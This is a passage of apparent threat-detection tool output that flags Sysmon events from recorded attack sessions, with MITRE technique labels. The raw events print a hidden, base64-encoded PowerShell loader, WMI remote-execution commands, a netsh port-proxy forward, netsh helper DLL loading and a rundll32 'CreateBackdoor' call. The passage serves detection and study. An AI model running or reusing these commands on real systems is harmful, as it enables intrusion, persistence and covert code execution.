pK91D4m4vIcXhjfnfwFhhx3MPQoAAA=='))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) C:\Windows\system32\ NT AUTHORITY\SYSTEM 365ABB72-2586-5CC9-0000-0020E7030000 0x3e7 0 System SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C 365ABB72-AF8B-5CC8-0000-0010AC1B1900 3872 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564436038.683059,2019-07-30T01:33:58.683059+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 ),1," 1 5 4 1 0 0x8000000000000000 4949 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:33:58.357 747F3D96-6646-5D3F-0000-0010A7398B00 3868 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-6609-5D3F-0000-00109FBF8500 1208 C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1602975185.822098,2020-10-18T02:53:05.822098+04:00,,Threat,Low,"Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 )",1," 1 5 4 1 0 0x8000000000000000 421227 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-10-17 22:53:05.776 747F3D96-75D1-5F8B-0000-001088C23300 2784 C:\Windows\System32\cmd.exe 10.0.17763.592 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 C:\ MSEDGEWIN10\Administrator 747F3D96-75D0-5F8B-0000-0020A8A83300 0x33a8a8 0 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-75D1-5F8B-0000-00101DAB3300 2228 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational Prohibited Process connecting to internet,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( IEWIN7 and IP ( 10.0.2.16 ) to hostname ( ) , IP ( 10.0.2.17 ) and port ( 55683 )",3," 3 5 4 3 0 0x8000000000000000 17590 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-14 01:29:00.318 365ABB72-19E0-5CDA-0000-001006711000 1932 C:\Windows\System32\mshta.exe IEWIN7\IEUser tcp false false 10.0.2.16 IEWIN7 49168 false 10.0.2.17 55683 ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Process,1602975185.822098,2020-10-18T02:53:05.822098+04:00,,Threat,High,"Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 )",1," 1 5 4 1 0 0x8000000000000000 421227 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-10-17 22:53:05.776 747F3D96-75D1-5F8B-0000-001088C23300 2784 C:\Windows\System32\cmd.exe 10.0.17763.592 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 C:\ MSEDGEWIN10\Administrator 747F3D96-75D0-5F8B-0000-0020A8A83300 0x33a8a8 0 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-75D1-5F8B-0000-00101DAB3300 2228 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1602975185.822098,2020-10-18T02:53:05.822098+04:00,,Threat,High,"Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 )",1," 1 5 4 1 0 0x8000000000000000 421227 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-10-17 22:53:05.776 747F3D96-75D1-5F8B-0000-001088C23300 2784 C:\Windows\System32\cmd.exe 10.0.17763.592 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 C:\ MSEDGEWIN10\Administrator 747F3D96-75D0-5F8B-0000-0020A8A83300 0x33a8a8 0 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-75D1-5F8B-0000-00101DAB3300 2228 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\sqlsvc) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c set > c:\users\\public\netstat.txt ),1," 1 5 4 1 0 0x8000000000000000 56509 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-11-03 13:51:56.380 747F3D96-DB7C-5DBE-0000-0010CF6B9502 5004 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c set > c:\users\\public\netstat.txt C:\Windows\system32\ MSEDGEWIN10\sqlsvc 747F3D96-CE3B-5DBE-0000-00201ED50100 0x1d51e 0 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-CE42-5DBE-0000-0010EE430200 3936 C:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe "c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe" -sSQLEXPRESS ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational Prohibited Process connecting to internet,1608044416.699632,2020-12-15T19:00:16.699632+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10 and IP ( 10.0.2.15 ) to hostname ( MSEDGEWIN10CLONE ) , IP ( 10.0.2.17 ) and port ( 49666 )",3," 3 5 4 3 0 0x8000000000000000 589975 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-12-15 15:00:14.470 747F3D96-CF4B-5FD8-0000-00101AD58700 6976 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MSEDGEWIN10\IEUser tcp true false 10.0.2.15 MSEDGEWIN10 50008 false 10.0.2.17 MSEDGEWIN10CLONE 49666 ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564436038.598592,2019-07-30T01:33:58.598592+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 ),1," 1 5 4 1 0 0x8000000000000000 4948 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:33:58.355 747F3D96-6646-5D3F-0000-001029398B00 6760 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-6609-5D3F-0000-00109FBF8500 1208 C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [ T1218.005 ] Mshta found running in the system,1557797345.534521,2019-05-14T05:29:05.534521+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line (C:\Windows\System32\mshta.exe -Embedding) and Parent Image :C:\Windows\System32\svchost.exe , Parent CommandLine (C:\Windows\system32\svchost.exe -k DcomLaunch) in directory : ( C:\Windows\system32\ )",1," 1 5 4 1 0 0x8000000000000000 17589 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-14 01:29:04.293 365ABB72-19E0-5CDA-0000-001006711000 1932 C:\Windows\System32\mshta.exe 11.00.9600.16428 (winblue_gdr.131013-1700) Microsoft (R) HTML Application host Internet Explorer Microsoft Corporation C:\Windows\System32\mshta.exe -Embedding C:\Windows\system32\ IEWIN7\IEUser 365ABB72-19E0-5CDA-0000-0020CE701000 0x1070ce 0 High SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A 365ABB72-965E-5CDA-0000-0010AF760000 596 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch ",IEWIN7,Microsoft-Windows-Sysmon/Operational [ T0000 ] Suspicious process name detected,1557797345.534521,2019-05-14T05:29:05.534521+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( C:\Windows\System32\mshta.exe -Embedding ) contain suspicious command ( \mshta.exe),1," 1 5 4 1 0 0x8000000000000000 17589 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-14 01:29:04.293 365ABB72-19E0-5CDA-0000-001006711000 1932 C:\Windows\System32\mshta.exe 11.00.9600.16428 (winblue_gdr.131013-1700) Microsoft (R) HTML Application host Internet Explorer Microsoft Corporation C:\Windows\System32\mshta.exe -Embedding C:\Windows\system32\ IEWIN7\IEUser 365ABB72-19E0-5CDA-0000-0020CE701000 0x1070ce 0 High SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A 365ABB72-965E-5CDA-0000-0010AF760000 596 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1170] Detecting Mshta,1557797345.534521,2019-05-14T05:29:05.534521+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line (C:\Windows\System32\mshta.exe -Embedding) and Parent Image :C:\Windows\System32\svchost.exe , Parent CommandLine (C:\Windows\system32\svchost.exe -k DcomLaunch) in directory : ( C:\Windows\system32\ )",1," 1 5 4 1 0 0x8000000000000000 17589 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-14 01:29:04.293 365ABB72-19E0-5CDA-0000-001006711000 1932 C:\Windows\System32\mshta.exe 11.00.9600.16428 (winblue_gdr.131013-1700) Microsoft (R) HTML Application host Internet Explorer Microsoft Corporation C:\Windows\System32\mshta.exe -Embedding C:\Windows\system32\ IEWIN7\IEUser 365ABB72-19E0-5CDA-0000-0020CE701000 0x1070ce 0 High SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A 365ABB72-965E-5CDA-0000-0010AF760000 596 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch ",IEWIN7,Microsoft-Windows-Sysmon/Operational [ T1086 ] Powershell with Suspicious Argument,1618950780.296686,2021-04-21T00:33:00.296686+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include (powershell,\Windows\System32,powershell,\Windows\System32) in event with Command Line ("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile) and Parent Image :C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , Parent CommandLine ("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe") in directory : ( C:\Windows\system32\ )",1," 1 5 4 1 0 0x8000000000000000 578497 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2021-04-20 20:32:55.351 747F3D96-3A77-607F-0000-00105DD17600 7280 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10.0.17763.1 (WinBuild.160101.0800) Windows PowerShell Microsoft® Windows® Operating System Microsoft Corporation PowerShell.EXE "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-0433-607F-0000-002073600700 0x76073 1 High SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F 747F3D96-04C3-607F-0000-0010F13B1E00 2532 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1584766825.4512,2020-03-21T09:00:25.451200+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," 1 5 4 1 0 0x8000000000000000 243556 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:25.441 747F3D96-9F69-5E75-0000-00102F962000 6136 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1086] PowerShell Process found,1618950780.296686,2021-04-21T00:33:00.296686+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile ),1," 1 5 4 1 0 0x8000000000000000 578497 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2021-04-20 20:32:55.351 747F3D96-3A77-607F-0000-00105DD17600 7280 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10.0.17763.1 (WinBuild.160101.0800) Windows PowerShell Microsoft® Windows® Operating System Microsoft Corporation PowerShell.EXE "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-0433-607F-0000-002073600700 0x76073 1 High SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F 747F3D96-04C3-607F-0000-0010F13B1E00 2532 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.4512,2020-03-21T09:00:25.451200+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," 1 5 4 1 0 0x8000000000000000 243556 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:25.441 747F3D96-9F69-5E75-0000-00102F962000 6136 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational Prohibited Process connecting to internet,1608044415.695478,2020-12-15T19:00:15.695478+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10 and IP ( 10.0.2.15 ) to hostname ( MSEDGEWIN10CLONE ) , IP ( 10.0.2.17 ) and port ( 135 )",3," 3 5 4 3 0 0x8000000000000000 589974 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-12-15 15:00:14.467 747F3D96-CF4B-5FD8-0000-00101AD58700 6976 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MSEDGEWIN10\IEUser tcp true false 10.0.2.15 MSEDGEWIN10 50007 false 10.0.2.17 MSEDGEWIN10CLONE 135 epmap ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564436038.543692,2019-07-30T01:33:58.543692+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh.exe add helper AllTheThings.dll ),1," 1 5 4 1 0 0x8000000000000000 4947 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:33:58.336 747F3D96-6646-5D3F-0000-001051388B00 3824 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd /c netsh.exe add helper AllTheThings.dll C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-6609-5D3F-0000-00109FBF8500 1208 C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1584766825.4512,2020-03-21T09:00:25.451200+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," 1 5 4 1 0 0x8000000000000000 243556 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:25.441 747F3D96-9F69-5E75-0000-00102F962000 6136 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1602975185.720846,2020-10-18T02:53:05.720846+04:00,,Threat,Low,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 ),1," 1 5 4 1 0 0x8000000000000000 421225 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-10-17 22:53:05.675 747F3D96-75D1-5F8B-0000-001061BD3300 4864 C:\Windows\System32\cmd.exe 10.0.17763.592 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 C:\ MSEDGEWIN10\Administrator 747F3D96-75D0-5F8B-0000-0020A8A83300 0x33a8a8 0 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-75D1-5F8B-0000-00101DAB3300 2228 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Process,1602975185.720846,2020-10-18T02:53:05.720846+04:00,,Threat,High,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 ),1," 1 5 4 1 0 0x8000000000000000 421225 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-10-17 22:53:05.675 747F3D96-75D1-5F8B-0000-001061BD3300 4864 C:\Windows\System32\cmd.exe 10.0.17763.592 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 C:\ MSEDGEWIN10\Administrator 